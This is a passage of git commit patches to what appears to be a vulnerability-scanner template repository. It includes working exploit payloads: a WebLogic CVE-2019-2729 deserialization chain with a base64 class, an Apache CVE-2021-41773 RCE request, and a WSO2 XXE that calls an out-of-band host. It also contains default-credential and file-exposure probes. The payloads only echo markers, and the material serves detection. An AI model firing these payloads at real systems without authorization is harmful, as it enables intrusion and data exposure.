RlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope> + + matchers-condition: and + matchers: + + - type: word + words: + - "CVE-2019-2729" + + - type: status + status: + - 200 \ No newline at end of file From 1eaff3bfff72535c9496411ca09b8f7e4b41170c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 21 Oct 2021 07:17:51 +0530 Subject: [PATCH 3062/4083] misc update --- default-logins/hp/hp-switch-default-login.yaml | 4 +--- .../idemia/idemia-biometrics-default-login.yaml | 9 ++++----- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index aa854686cb..beada2b11a 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -20,15 +20,13 @@ requests: username: - admin - attack: sniper - matchers-condition: and matchers: - type: word + condition: and words: - '"redirect": "/htdocs/pages/main/main.lsp"' - '"error": ""' - condition: and - type: status status: diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 9c7aa9d12a..959da5926b 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -18,22 +18,21 @@ requests: payloads: password: - - 12345 - attack: sniper + - "12345" matchers-condition: and matchers: - type: word + condition: and words: - "session_id=" - "resource" - condition: and - type: word - words: - - "Invalid Password" part: body negative: true + words: + - "Invalid Password" - type: status status: From 56b0f60d5a26b2ad56d2b76b35263b5f3f47fb13 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Thu, 21 Oct 2021 00:57:23 -0300 Subject: [PATCH 3063/4083] Update CVE-2021-41773.yaml Fixes false positive due to IPS/ 'Request denied by WatchGuard Firewall.</p><p><b> Reason: </b> IPS detected for "WEB Apache HTTP Server Path traversal (CVE-2021-41773)"' --- cves/2021/CVE-2021-41773.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 473c7adbcb..4b8ac8ef2a 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -31,7 +31,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev + echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev matchers-condition: or matchers: @@ -44,4 +44,4 @@ requests: - type: word name: RCE words: - - "CVE-2021-41773" + - "CVE-2021-41773-POC" From 691dab8a52adb6810d642cf7997495a175c4a56d Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 08:51:56 +0300 Subject: [PATCH 3064/4083] Add description --- vulnerabilities/other/phpwiki-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml index d48b733698..0d0a84e034 100644 --- a/vulnerabilities/other/phpwiki-lfi.yaml +++ b/vulnerabilities/other/phpwiki-lfi.yaml @@ -4,6 +4,7 @@ info: name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high + description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: https://www.exploit-db.com/exploits/38027 tags: phpwiki,lfi From f1d4569a8cfe5c40b2ac2bb7c76b4c49fe995830 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 08:52:48 +0300 Subject: [PATCH 3065/4083] Add description --- vulnerabilities/oracle/oracle-siebel-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml index 19e3bc099e..3d3374470c 100644 --- a/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -4,6 +4,7 @@ info: name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html tags: xss,oracle From 379513c0155f31cd5787ce1cc0e53fa750ec60dd Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 08:55:02 +0300 Subject: [PATCH 3066/4083] Make description more clear --- vulnerabilities/other/pmb-directory-traversal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 74427ef576..927daf9a9f 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -4,7 +4,7 @@ info: name: PMB 5.6 Directory Traversal author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure. + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html tags: lfi From 6d28009f5e618286c09f67135abecc3bc6a1f77f Mon Sep 17 00:00:00 2001 From: Sufijen Bani <git@sbani.net> Date: Thu, 21 Oct 2021 09:41:25 +0200 Subject: [PATCH 3067/4083] Add Deeper Search for Access Logs Search access logs in more folders. This happens for error logs too. --- exposures/logs/access-log.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/logs/access-log.yaml b/exposures/logs/access-log.yaml index 16c3349ad5..324e4fe9af 100644 --- a/exposures/logs/access-log.yaml +++ b/exposures/logs/access-log.yaml @@ -10,6 +10,9 @@ requests: - method: GET path: - "{{BaseURL}}/access.log" + - "{{BaseURL}}/log/access.log" + - "{{BaseURL}}/logs/access.log" + - "{{BaseURL}}/application/logs/access.log" matchers-condition: and matchers: From 378a682a5ed45deffdd8a705b32bbe7fdcefb052 Mon Sep 17 00:00:00 2001 From: Sufijen Bani <git@sbani.net> Date: Thu, 21 Oct 2021 09:45:23 +0200 Subject: [PATCH 3068/4083] Enhance Text Matching in Error Logs Some words are missing that normally indicate that this is an error log. --- exposures/logs/error-logs.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index fef1228189..ffa763ae58 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -45,6 +45,8 @@ requests: - "script headers" - "Broken pipe" - "Array" + - "Exception" + - "Fatal" condition: or - type: word From fe4e6b8246a5562b682ee7c94b49f33c953df2be Mon Sep 17 00:00:00 2001 From: Philipp Dahse <philipp.dahse@check24.de> Date: Thu, 21 Oct 2021 10:14:04 +0200 Subject: [PATCH 3069/4083] Add Symfony Security Config Expose Template Symfony security contain information about used encryption algorithms and list which routes are protected --- .../configs/symfony-security-config.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/symfony-security-config.yaml diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml new file mode 100644 index 0000000000..f11db61824 --- /dev/null +++ b/exposures/configs/symfony-security-config.yaml @@ -0,0 +1,26 @@ +id: symfony-security-config + +info: + name: Symfony Security Configuration Exposure + author: dahse89 + severity: info + tags: config,exposure,symfony + reference: + - https://symfony2-document.readthedocs.io/en/latest/book/security.html + - https://symfony.com/doc/current/reference/configuration/security.html + +requests: + - method: GET + path: + - "{{BaseURL}}/config/packages/security.yaml" + - "{{BaseURL}}/app/config/security.yml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "security:" + condition: and + part: body From ac9f713d97ec1500da40aaf42862f8e771443aa2 Mon Sep 17 00:00:00 2001 From: Sufijen Bani <git@sbani.net> Date: Thu, 21 Oct 2021 10:33:49 +0200 Subject: [PATCH 3070/4083] Merge PHP Errors Templates There was an extra error template for PHP warnings although there was another template holding that already. The status code check (500) is a step that would make sense for all of the checks. This is not limited to warnings. Though I think that error code 500 shrinks the result set too much in this case. That's why I would leave it out. --- exposures/logs/php-warning.yaml | 25 ------------------------- misconfiguration/php-errors.yaml | 6 +++++- 2 files changed, 5 insertions(+), 26 deletions(-) delete mode 100644 exposures/logs/php-warning.yaml diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml deleted file mode 100644 index 4c35a35f47..0000000000 --- a/exposures/logs/php-warning.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: php-warning - -info: - name: PHP warning - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22 - tags: exposure,php,debug - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: regex - regex: - - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' - - - type: status - status: - - 500 - - 503 - condition: or diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index df2a0c9ae2..2e12d8ec22 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,7 +2,10 @@ id: php-errors info: name: PHP errors - author: w4cky_,geeknik + author: w4cky_,geeknik,dhiyaneshDK + reference: + - https://www.shodan.io/search?query=%22Fatal+error%22 + - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22 severity: info tags: debug,php @@ -20,6 +23,7 @@ requests: - '(?i)MySQL server version for the right syntax to use near' - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' + - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' - '(?i)SAFE MODE Restriction in effect' From b39200b8e4b51578a89828f7defbc9cdefd449ea Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 15:47:46 +0530 Subject: [PATCH 3071/4083] Update CVE-2021-33044.yaml --- cves/2021/CVE-2021-33044.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml index 7797b9e08e..6af86d7e1f 100644 --- a/cves/2021/CVE-2021-33044.yaml +++ b/cves/2021/CVE-2021-33044.yaml @@ -40,7 +40,7 @@ requests: - type: word part: body words: - - "true" + - "\"result\":true" - "id" - "params" - "session" From 09d143b885d88286e2f358857813e56491345f6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 16:10:24 +0530 Subject: [PATCH 3072/4083] Update and rename .idea-folder-with-sensitive-files.yaml to idea-folder-exposure.yaml --- .../.idea-folder-with-sensitive-files.yaml | 19 ------------------ exposures/files/idea-folder-exposure.yaml | 20 +++++++++++++++++++ 2 files changed, 20 insertions(+), 19 deletions(-) delete mode 100644 exposures/files/.idea-folder-with-sensitive-files.yaml create mode 100644 exposures/files/idea-folder-exposure.yaml diff --git a/exposures/files/.idea-folder-with-sensitive-files.yaml b/exposures/files/.idea-folder-with-sensitive-files.yaml deleted file mode 100644 index 123c126d92..0000000000 --- a/exposures/files/.idea-folder-with-sensitive-files.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: .idea-folder-with.sensitive-files - -info: - name: Reachable or public .idea-Folder files containing sensitive data - author: martincodes-de - severity: high - description: Searches for .idea-Folder by querying the /.idea and a few other files with sensitive data endpoints - tags: phpstorm, jetbrains, .idea, sensitive data - -requests: - - method: GET - path: - - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - - "{{BaseURL}}/.idea/deployment.xml" - - "{{BaseURL}}/.idea/workspace.xml" - matchers: - - type: status - status: - - 200 \ No newline at end of file diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml new file mode 100644 index 0000000000..d268dbb54d --- /dev/null +++ b/exposures/files/idea-folder-exposure.yaml @@ -0,0 +1,20 @@ +id: idea-folder-exposure + +info: + name: Public .idea Folder containing files with sensitive data + author: martincodes-de + severity: info + description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data. + tags: phpstorm,jetbrains,idea,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/deployment.xml" + - "{{BaseURL}}/.idea/workspace.xml" + + matchers: + - type: status + status: + - 200 From 7cfaf6c7ddef3fec47bd723537c826585dc3c56a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 21 Oct 2021 10:43:47 +0000 Subject: [PATCH 3073/4083] Auto Generated CVE annotations [Thu Oct 21 10:43:47 UTC 2021] :robot: --- cves/2016/CVE-2016-1000143.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml index 95cc66fabf..65b05e634d 100644 --- a/cves/2016/CVE-2016-1000143.yaml +++ b/cves/2016/CVE-2016-1000143.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000143 + cwe-id: CWE-79 requests: - method: GET From 7e4cd54f9e25a8dd96e0249dd74e75d5dca656ad Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:13:53 +0300 Subject: [PATCH 3074/4083] Add description --- vulnerabilities/other/qcubed-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index 5309d50deb..420879092a 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -4,6 +4,7 @@ info: name: Qcubed Reflected XSS author: pikpikcu severity: medium + description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. reference: https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed From ae55315ec6097964cc9262c23cf98e56570c5ddd Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:15:52 +0300 Subject: [PATCH 3075/4083] Improve description --- vulnerabilities/other/qihang-media-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml index a4bcd43d65..42e4aaed79 100644 --- a/vulnerabilities/other/qihang-media-lfi.yaml +++ b/vulnerabilities/other/qihang-media-lfi.yaml @@ -4,7 +4,7 @@ info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability author: gy741 severity: high - description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. + description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php tags: qihang,lfi From 07472bb02102b98d4be0ef226a98166592b21a80 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:21:38 +0300 Subject: [PATCH 3076/4083] Add description --- vulnerabilities/other/sangfor-edr-auth-bypass.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml index bd15d6ff70..2e4aa14045 100644 --- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml @@ -3,6 +3,7 @@ info: name: Sangfor EDR Authentication Bypass author: princechaddha severity: high + description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. tags: sangfor,auth-bypass requests: From 0cb293abcaf17d0cfcb14a710122c1d7ae05f106 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:25:28 +0300 Subject: [PATCH 3077/4083] Add description --- vulnerabilities/wordpress/ultimatemember-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 84f1391b8e..55110ec907 100644 --- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: Ultimate Member < 2.1.7 - Unauthenticated Open Redirect author: 0x_Akoko severity: medium + description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f tags: wp-plugin,redirect,wordpress From 197c550fcec239ef985abbaa35271a4debcce0a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 19:19:21 +0530 Subject: [PATCH 3078/4083] Update symfony-security-config.yaml --- exposures/configs/symfony-security-config.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml index f11db61824..f1365ebe3d 100644 --- a/exposures/configs/symfony-security-config.yaml +++ b/exposures/configs/symfony-security-config.yaml @@ -4,23 +4,27 @@ info: name: Symfony Security Configuration Exposure author: dahse89 severity: info - tags: config,exposure,symfony reference: - https://symfony2-document.readthedocs.io/en/latest/book/security.html - https://symfony.com/doc/current/reference/configuration/security.html + tags: config,exposure,symfony requests: - method: GET path: - "{{BaseURL}}/config/packages/security.yaml" - "{{BaseURL}}/app/config/security.yml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "security:" + - "firewalls:" + - "access_control:" condition: and part: body From fc39fdd2f753a5f2b221d14fb8a74188336b183b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 19:29:49 +0530 Subject: [PATCH 3079/4083] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index d268dbb54d..d3d57a227d 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -13,8 +13,8 @@ requests: - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" - + matchers: - type: status - status: - - 200 + status: + - 200 From 15a8208fc6ecc8dd63f9ad35518929ddf4be1127 Mon Sep 17 00:00:00 2001 From: lethargynavigator <1496294+lethargynavigator@users.noreply.github.com> Date: Thu, 21 Oct 2021 11:02:55 -0400 Subject: [PATCH 3080/4083] full poc --- cves/2020/CVE-2020-24589.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cves/2020/CVE-2020-24589.yaml b/cves/2020/CVE-2020-24589.yaml index 8d612f1020..156cfd49e8 100644 --- a/cves/2020/CVE-2020-24589.yaml +++ b/cves/2020/CVE-2020-24589.yaml @@ -13,16 +13,17 @@ info: cve-id: CVE-2020-24589 requests: - - method: GET - path: - - "{{BaseURL}}/carbon/generic/save_artifact_ajaxprocessor.jsp" + - raw: + - | + POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]> matchers-condition: and matchers: - - type: status - status: - - 500 - type: word - part: body + part: interactsh_protocol words: - - "Failed to install the generic artifact type" + - "dns" From 5f620a25164fafe88a99f3cdf0b13c8ee47b8b66 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Thu, 21 Oct 2021 12:10:37 -0300 Subject: [PATCH 3081/4083] Create microstrategy-detect.yaml --- technologies/microstrategy-detect.yaml | 56 ++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 technologies/microstrategy-detect.yaml diff --git a/technologies/microstrategy-detect.yaml b/technologies/microstrategy-detect.yaml new file mode 100644 index 0000000000..def5c80c45 --- /dev/null +++ b/technologies/microstrategy-detect.yaml @@ -0,0 +1,56 @@ +id: microstrategy-detect + +info: + name: MicroStrategy Instances Detection Template + author: philippedelteil,Retr02332 + severity: info + description: Detect if MicroStrategy instances exist in your URLS + tags: microstrategy + +requests: + - method: GET + + path: + - "{{BaseURL}}/{{path}}" + + stop-at-first-match: true + redirects: true + max-redirects: 3 + + matchers: + - type: dsl + dsl: + - 'contains(body, "MicroStrategy, Incorporated.")' + - 'contains(body, "microstrategy.servletName")' + - 'contains(body, "mstrHiddenInput")' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'ProductHelp/([0-9.A-Z]+)' + - type: regex + part: body + group: 1 + regex: + - 'WELCOME. MicroStrategy ([0-9]+)' + payloads: + path: + - + - MicroStrategy/servlet/mstrWebAdmin/ + - MicroStrategy/servlet/mstrWebAdmin + - MicroStrategy/servlet/taskProc/ + - MicroStrategy/servlet/taskProc + - MicroStrategy/servlet/mstrWeb/ + - MicroStrategy/servlet/mstrWeb + - MicroStrategy/ + - MicroStrategy + - servlet/mstrWebAdmin/ + - servlet/mstrWebAdmin + - servlet/taskProc/ + - servlet/taskProc + - servlet/mstrWeb/ + - servlet/mstrWeb + - asp/Main.aspx + - MicroStrategy/asp From 20458382e63010fa8f8d4b6380770cba9b07956d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 21 Oct 2021 22:22:40 +0530 Subject: [PATCH 3082/4083] Create fireware-xtm-user-authentication.yaml --- .../fireware-xtm-user-authentication.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/fireware-xtm-user-authentication.yaml diff --git a/exposed-panels/fireware-xtm-user-authentication.yaml b/exposed-panels/fireware-xtm-user-authentication.yaml new file mode 100644 index 0000000000..2f351d82e1 --- /dev/null +++ b/exposed-panels/fireware-xtm-user-authentication.yaml @@ -0,0 +1,23 @@ +id: fireware-xtm-user-authentication + +info: + name: Fireware XTM User Authentication + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'http.title:"Fireware XTM User Authentication"' + +requests: + - method: GET + path: + - '{{BaseURL}}/sslvpn_logon.shtml' + + matchers-condition: and + matchers: + - type: word + words: + - '<title>User Authentication' + - type: status + status: + - 200 From e7768bb3489ddb06f51e946de9d7badccdb32ae5 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 21 Oct 2021 22:25:42 +0530 Subject: [PATCH 3083/4083] misc update --- cves/2020/CVE-2020-24589.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-24589.yaml b/cves/2020/CVE-2020-24589.yaml index 156cfd49e8..b4d8205149 100644 --- a/cves/2020/CVE-2020-24589.yaml +++ b/cves/2020/CVE-2020-24589.yaml @@ -3,10 +3,10 @@ id: CVE-2020-24589 info: name: WSO2 API Manager Blind XXE author: lethargynavigator + severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XXE. reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - severity: critical - tags: cve,cve2020,wso2,api-manager,xxe + tags: cve,cve2020,wso2,xxe,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 @@ -26,4 +26,9 @@ requests: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: word + part: body + words: + - "Failed to install the generic artifact type" From 0507d31ea7585efbe3af350f32a3550de564de02 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 21 Oct 2021 22:31:16 +0530 Subject: [PATCH 3084/4083] Create ibm-advanced-system-management.yaml --- .../ibm-advanced-system-management.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/ibm-advanced-system-management.yaml diff --git a/exposed-panels/ibm-advanced-system-management.yaml b/exposed-panels/ibm-advanced-system-management.yaml new file mode 100644 index 0000000000..4e1fe186df --- /dev/null +++ b/exposed-panels/ibm-advanced-system-management.yaml @@ -0,0 +1,23 @@ +id: ibm-advanced-system-management + +info: + name: IBM Advanced System Management + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'http.title:"Advanced System Management"' + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/cgi' + + matchers-condition: and + matchers: + - type: word + words: + - '<title>Advanced System Management' + - type: status + status: + - 200 From b57bc0eb256b99d6d03fdc287a8d8aa544d466d2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Oct 2021 22:34:05 +0530 Subject: [PATCH 3085/4083] Create ibm-service-assistant.yaml --- exposed-panels/ibm-service-assistant.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/ibm-service-assistant.yaml diff --git a/exposed-panels/ibm-service-assistant.yaml b/exposed-panels/ibm-service-assistant.yaml new file mode 100644 index 0000000000..6048271ece --- /dev/null +++ b/exposed-panels/ibm-service-assistant.yaml @@ -0,0 +1,23 @@ +id: ibm-service-assistant + +info: + name: IBM Service Assistant + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'http.title:"Welcome to Service Assistant"' + +requests: + - method: GET + path: + - '{{BaseURL}}/service/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to Service Assistant' + - type: status + status: + - 200 From bb5354d8b5f097a41ff8fc73c72032bf83fd3554 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Oct 2021 22:44:19 +0530 Subject: [PATCH 3086/4083] Create cloudphysician-radar.yaml --- exposed-panels/cloudphysician-radar.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/cloudphysician-radar.yaml diff --git 